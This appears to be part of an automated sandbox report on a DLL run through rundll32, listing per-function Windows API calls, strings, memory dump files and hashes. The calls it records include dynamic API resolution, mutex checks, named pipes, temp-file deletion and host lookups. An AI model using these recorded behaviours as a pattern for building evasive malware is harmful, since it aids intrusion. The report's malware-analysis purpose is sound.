                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$FileHandleModule$CloseCountDeleteHeapLibraryLoadMutexNameOpenProcessSleepTick
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2411591737-0
                                                                                                                                                      • Opcode ID: aaccbc2ed6a62b374cf1b3482786e29b781fb4819d4d040a4fe17441c6d66a16
                                                                                                                                                      • Instruction ID: 65e72076bd77d6e5d7b516daa6b53ac4a121c74a8a12eb468708dcb55bbe030b
                                                                                                                                                      • Opcode Fuzzy Hash: aaccbc2ed6a62b374cf1b3482786e29b781fb4819d4d040a4fe17441c6d66a16
                                                                                                                                                      • Instruction Fuzzy Hash: 71417E71B0CA4286EB10DB22E8442B977A6FB46BA4F5451F6DA5E437A6DF3CE045CB00

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressGlobalHandleMemoryModuleProcStatus
                                                                                                                                                      • String ID: @
                                                                                                                                                      • API String ID: 2450578220-2766056989
                                                                                                                                                      • Opcode ID: 0afb79ebcdfbdeb580ecc7f8eacd47776bfb190c1650612288748f96ddd47335
                                                                                                                                                      • Instruction ID: 63f78c4a04c9070f08728a45ec949b62440133c696fc19e79f54b490c3ec3e15
                                                                                                                                                      • Opcode Fuzzy Hash: 0afb79ebcdfbdeb580ecc7f8eacd47776bfb190c1650612288748f96ddd47335
                                                                                                                                                      • Instruction Fuzzy Hash: 8AF04F11B1CA4692EE10DB66F4140796392AB89FE4F8800F6DA8E47766DE2CD041CA10

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FFE1A511383), ref: 00007FFE1A51220A
                                                                                                                                                      • CreateMutexExW.KERNEL32(?,?,?,00007FFE1A511383), ref: 00007FFE1A512217
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FFE1A511383), ref: 00007FFE1A512229
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,00007FFE1A511383), ref: 00007FFE1A5122A8
                                                                                                                                                        • Part of subcall function 00007FFE1A517BB0: LoadLibraryW.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517BDF
                                                                                                                                                        • Part of subcall function 00007FFE1A517BB0: GetProcAddress.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517C16
                                                                                                                                                        • Part of subcall function 00007FFE1A517BB0: LoadLibraryW.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517C46
                                                                                                                                                        • Part of subcall function 00007FFE1A517BB0: GetProcAddress.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517C7D
                                                                                                                                                        • Part of subcall function 00007FFE1A517BB0: GetCommandLineW.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517C92
                                                                                                                                                        • Part of subcall function 00007FFE1A517BB0: CommandLineToArgvW.SHELL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517CA0
                                                                                                                                                        • Part of subcall function 00007FFE1A517BB0: LocalFree.KERNEL32(?,?,00000000,00007FFE1A517D51,?,?,00000000,00007FFE1A51228A,?,?,?,00007FFE1A511383), ref: 00007FFE1A517D0E
                                                                                                                                                        • Part of subcall function 00007FFE1A515670: CreateMutexW.KERNEL32 ref: 00007FFE1A5156A5
                                                                                                                                                        • Part of subcall function 00007FFE1A515670: Sleep.KERNEL32 ref: 00007FFE1A5156B8
                                                                                                                                                        • Part of subcall function 00007FFE1A515670: CloseHandle.KERNEL32 ref: 00007FFE1A5156C1
                                                                                                                                                        • Part of subcall function 00007FFE1A515670: Sleep.KERNEL32 ref: 00007FFE1A51570F
                                                                                                                                                        • Part of subcall function 00007FFE1A515670: GetTickCount.KERNEL32 ref: 00007FFE1A515715
                                                                                                                                                        • Part of subcall function 00007FFE1A515670: rand.LIBCMT ref: 00007FFE1A515722
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressCloseCommandCreateErrorHandleLastLibraryLineLoadMutexProcSleep$ArgvCountFreeLocalTickrand
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1739745066-0
                                                                                                                                                      • Opcode ID: 007474db8946118fe8e355bdae2cebbab7dfe6101b2419ff64d7ce1083001067
                                                                                                                                                      • Instruction ID: 2bad742780335e2f9ed0bde02e135f6ad5ddaa4890bcc880368a0e3e645cc9fd
                                                                                                                                                      • Opcode Fuzzy Hash: 007474db8946118fe8e355bdae2cebbab7dfe6101b2419ff64d7ce1083001067
                                                                                                                                                      • Instruction Fuzzy Hash: 48212760F1CE4381FA54AB63691117E6293AF57FF4F4440F7ED5E86AA6EE2CE4018250
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2574300362-0
                                                                                                                                                      • Opcode ID: 504d3d5ea27a1ec0ca3ae44b2ac06d5499e97c70d6572123b3758e013bd21691
                                                                                                                                                      • Instruction ID: 0b1a02e1c3674cf7095295a72767b1fb6d9a3c0fe7502492e1b8803ac71778fe
                                                                                                                                                      • Opcode Fuzzy Hash: 504d3d5ea27a1ec0ca3ae44b2ac06d5499e97c70d6572123b3758e013bd21691
                                                                                                                                                      • Instruction Fuzzy Hash: 7E119521F1DF4290EA509B52A85537923A2BF96BA4F8401F7D94E476B1EF2CE505C610
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCreateHandleThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3032276028-0
                                                                                                                                                      • Opcode ID: 8cfc052431e2fe914d99a1079fcf1934225668cbea66fe8ac47fcc2c739b686d
                                                                                                                                                      • Instruction ID: 76fd12b5448042ccf2aee6879835bff2bef3a867ce86e14336f18fa189e23537
                                                                                                                                                      • Opcode Fuzzy Hash: 8cfc052431e2fe914d99a1079fcf1934225668cbea66fe8ac47fcc2c739b686d
                                                                                                                                                      • Instruction Fuzzy Hash: 6BE04F21F0DF8192EB14CB62A8402B53772FB86B69F9041FBD94E02770EE3CD204C600
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00007FFE1A5115B0: LoadLibraryW.KERNEL32 ref: 00007FFE1A5115DB
                                                                                                                                                        • Part of subcall function 00007FFE1A5115B0: GetProcAddress.KERNEL32 ref: 00007FFE1A511615
                                                                                                                                                      • SHGetFolderPathW.SHELL32 ref: 00007FFE1A51132C
                                                                                                                                                        • Part of subcall function 00007FFE1A5113A0: LoadLibraryW.KERNEL32 ref: 00007FFE1A5113D7
                                                                                                                                                        • Part of subcall function 00007FFE1A5113A0: GetProcAddress.KERNEL32 ref: 00007FFE1A51140E
                                                                                                                                                        • Part of subcall function 00007FFE1A5113A0: GetProcAddress.KERNEL32 ref: 00007FFE1A511445
                                                                                                                                                        • Part of subcall function 00007FFE1A5113A0: GetProcAddress.KERNEL32 ref: 00007FFE1A51147C
                                                                                                                                                        • Part of subcall function 00007FFE1A5113A0: sprintf_s.LIBCMTD ref: 00007FFE1A5114B3
                                                                                                                                                        • Part of subcall function 00007FFE1A5113A0: FindFirstFileW.KERNEL32 ref: 00007FFE1A5114CD
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$LibraryLoad$FileFindFirstFolderPathsprintf_s
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2295756454-0
                                                                                                                                                      • Opcode ID: a93a366b1067c516a2c5388df4c4fc0c196fb9a44ef68532cc3e3670074d5784
                                                                                                                                                      • Instruction ID: 60b44061a4883b79c66b4d1d548233400c97e60c6ea8589a223ff7c8f37ad727
                                                                                                                                                      • Opcode Fuzzy Hash: a93a366b1067c516a2c5388df4c4fc0c196fb9a44ef68532cc3e3670074d5784
                                                                                                                                                      • Instruction Fuzzy Hash: 62011621F1CF4291FA247672B4897BC3166BF57BA4F5414FBE24E81AFB9D2CE1804512
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Sleep
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                      • Opcode ID: 354914485c76ce71eee5e368870040763071e6f1620a4b606cf0e1d3c0a82ec0
                                                                                                                                                      • Instruction ID: 878a60dfb9c499cfe5c676fcfcef8d77968ffa5a8221bf4a6b1eb47a8eac656a
                                                                                                                                                      • Opcode Fuzzy Hash: 354914485c76ce71eee5e368870040763071e6f1620a4b606cf0e1d3c0a82ec0
                                                                                                                                                      • Instruction Fuzzy Hash: 49D09225E0DB4AC7E6941706A89877432A2AB96B29F9040FAC10A012F14E3C24D5CA00
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Handle$Close$Pipe$ByteCharCreateCurrentDirectoryModuleMultiNamedPeekProcessWide$FileInformationObjectReadSingleSleepTerminateWaitsprintf_s
                                                                                                                                                      • String ID: 2
                                                                                                                                                      • API String ID: 1694488271-450215437
                                                                                                                                                      • Opcode ID: 61d8321d1346369c2d04f836b7ec7d76cda028776995c865a42c467b8aec4cfc
                                                                                                                                                      • Instruction ID: 8c914c178dea5517f3ef1cfe50378ccda432f1b42be8a85285450510ce6e2199
                                                                                                                                                      • Opcode Fuzzy Hash: 61d8321d1346369c2d04f836b7ec7d76cda028776995c865a42c467b8aec4cfc
                                                                                                                                                      • Instruction Fuzzy Hash: E5E1617270DB8286EB10CF66A4502B97BA2FB86FA8F4441B6DA4D47BA5DF3CD144C740
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$DeleteTemp$CloseHandleName$AddressCreateDirectoryLibraryLoadPathProcProcessSystemsprintf_s
                                                                                                                                                      • String ID: %ls\%ls "%ls",$dat$h
                                                                                                                                                      • API String ID: 2143415541-650927715
                                                                                                                                                      • Opcode ID: 67e320bd700a9eddc28fe40f1a4a6760eb798dc9e6c7093fe6d0b7cac3e57d15
                                                                                                                                                      • Instruction ID: f740a0b811928c14da9800b1030afd83aac0f6e5b635bf143c40c9fcbcb3fa55
                                                                                                                                                      • Opcode Fuzzy Hash: 67e320bd700a9eddc28fe40f1a4a6760eb798dc9e6c7093fe6d0b7cac3e57d15
                                                                                                                                                      • Instruction Fuzzy Hash: C6C19E22718A8295DB10DF66D8512F973B2FB85FA8F8441B3DA0E43AA4DF3CD14AC750
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharCloseEnumMultiOpenWide$GlobalHandleMemoryModuleQueryStartupStatusValuegethostbynamegethostnameinet_ntoa
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2767472909-0
                                                                                                                                                      • Opcode ID: 0e7fbe9883d529331d68332c0a376186802381b6b0324fe57bb981fb92d1069f
                                                                                                                                                      • Instruction ID: 23ee12216ccc6b73aa93453eaa92559ab5f1e145b346df2076951eca3b5d002e
                                                                                                                                                      • Opcode Fuzzy Hash: 0e7fbe9883d529331d68332c0a376186802381b6b0324fe57bb981fb92d1069f
                                                                                                                                                      • Instruction Fuzzy Hash: F4B1747270CB8186E7208F26E8406BDB7A5FB85BA4F4441B6DA8E47BA4DF3CD545CB40
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Variant$ClearInitString$AllocFree$CreateInitializeInstanceUninitialize
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2615526013-0
                                                                                                                                                      • Opcode ID: a3ed77044e1bac965df96e1fa07373414ce81337b406c852ab00482a6af9236a
                                                                                                                                                      • Instruction ID: 6e4f8e7ab8ea13b5b89f09f01d4e32e2714c4d3388053e0704e11687f7d5423d
                                                                                                                                                      • Opcode Fuzzy Hash: a3ed77044e1bac965df96e1fa07373414ce81337b406c852ab00482a6af9236a
                                                                                                                                                      • Instruction Fuzzy Hash: 86516E22B18E96D6E711CF76E8041BD6371FB95BA8F405162EE4E53624DF3CD189C700
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2238633743-0
                                                                                                                                                      • Opcode ID: 0bfe53c474903e58965b61b7a659ccba2d14d3dd14d9afd4becd7c1e21fa82b1
                                                                                                                                                      • Instruction ID: 9ef3095e95ffb6e179e98f6602645407b6288fea3aa4a8078ad5b7ec71993e8d
                                                                                                                                                      • Opcode Fuzzy Hash: 0bfe53c474903e58965b61b7a659ccba2d14d3dd14d9afd4becd7c1e21fa82b1
                                                                                                                                                      • Instruction Fuzzy Hash: 1AD1D424B0DF4395EA50EB63A86457963A6AF86FB8F4400F7D90E47BB5EE3CE444C250
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$AttributesDelete$DirectoryEnvironmentExpandRemoveStrings
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4255994873-0
                                                                                                                                                      • Opcode ID: e546ce504db48212e5272dbf9f723b57ca87e23394bff795ec25ce4fdcdf01af
                                                                                                                                                      • Instruction ID: 556d7ccb380ff013333d2e661f5537bee02f7fbdde4fc716515a847050d3a558
                                                                                                                                                      • Opcode Fuzzy Hash: e546ce504db48212e5272dbf9f723b57ca87e23394bff795ec25ce4fdcdf01af
                                                                                                                                                      • Instruction Fuzzy Hash: 56E14966728D8194DB60DF2AD4512B973B2FB91B6CFC491A2DA0E435A0EF3CD64AC310
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: QueryValue$ByteCharCloseEnumMultiOpenWide$HeapProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2740835775-0
                                                                                                                                                      • Opcode ID: 94983d7cfb841727e5dd1a9b62022a2b6c6c50ca8c1aaca057d95404d2d5dd1a
                                                                                                                                                      • Instruction ID: d492ca8e11f235a46c77efb5fd59feb511ada28ed914eb27b9191116056745fe
                                                                                                                                                      • Opcode Fuzzy Hash: 94983d7cfb841727e5dd1a9b62022a2b6c6c50ca8c1aaca057d95404d2d5dd1a
                                                                                                                                                      • Instruction Fuzzy Hash: 30F1916270CBC295EB61CF12E4503B9B7A2FB96B68F8841B6CA8D476A5DF3DD105C310
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.2968658363.00007FFE1A511000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE1A510000, based on PE: true
                                                                                                                                                      • Associated: 0000000B.00000002.2968639796.00007FFE1A510000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968681762.00007FFE1A525000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968701960.00007FFE1A52F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      • Associated: 0000000B.00000002.2968721044.00007FFE1A533000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffe1a510000_rundll32.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 1ce9d91ef6712de882bb66c4feffc82626b6abde2748bdc3da009eb6c5ce1676
                                                                                                                                                      • Instruction ID: ccbcdc4689615ccc7d3903e03e0a34c4d53c6fce030f7b96c677450661a0b51d
                                                                                                                                                      • Opcode Fuzzy Hash: 1ce9d91ef6712de882bb66c4feffc82626b6abde2748bdc3da009eb6c5ce1676
                                                                                                                                                      • Instruction Fuzzy Hash: 7711653B334916076B4D853E9833DB81292C7D76057C9F77DED4ACA685EA2A441A8305
                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A516208), ref: 00007FFE1A516404
                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A516208), ref: 00007FFE1A51643B
                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A516208), ref: 00007FFE1A516472
                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A516208), ref: 00007FFE1A5164A9
                                                                                                                                                      • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A516208), ref: 00007FFE1A5164D9
                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A516208), ref: 00007FFE1A516510
                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A516208), ref: 00007FFE1A516547
                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A516208), ref: 00007FFE1A51657E
                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A516208), ref: 00007FFE1A5165B5
                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A516208), ref: 00007FFE1A5165EC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
